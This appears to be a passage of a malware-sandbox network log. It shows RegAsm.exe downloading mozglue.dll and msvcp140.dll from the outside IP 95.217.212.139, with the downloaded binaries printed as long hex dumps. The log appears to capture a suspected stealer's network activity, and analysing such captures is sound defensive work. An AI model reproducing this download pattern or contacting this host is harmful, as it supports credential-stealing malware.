                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                                                                                                                                          Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                                                                                                                                                          Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                                                                                                                                                          Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                                                                                                                                                          Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                                                                                                                                                          2024-04-10 06:56:31 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                                                                                                                                                          Data Ascii: 0<48%8A)$(


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          19192.168.2.44975995.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:32 UTC221OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:33 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 608080
                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6315a9f4-94750"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                                          Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                                                                                                                                                          Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                                                                                                                                                          Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                                                                                                                                                          Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                                                                                                                                                          Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                          Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                          Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                          Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                          Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                          2024-04-10 06:56:33 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                          Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          20192.168.2.44976095.217.212.1394437652C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-04-10 06:56:34 UTC222OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 OPR/108.0.0.0
                                                                                                                                                                                                          Host: 95.217.212.139
                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                          Date: Wed, 10 Apr 2024 06:56:35 GMT
                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                          Content-Length: 450024
                                                                                                                                                                                                          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                          Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                          Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                          2024-04-10 06:56:35 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                          Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
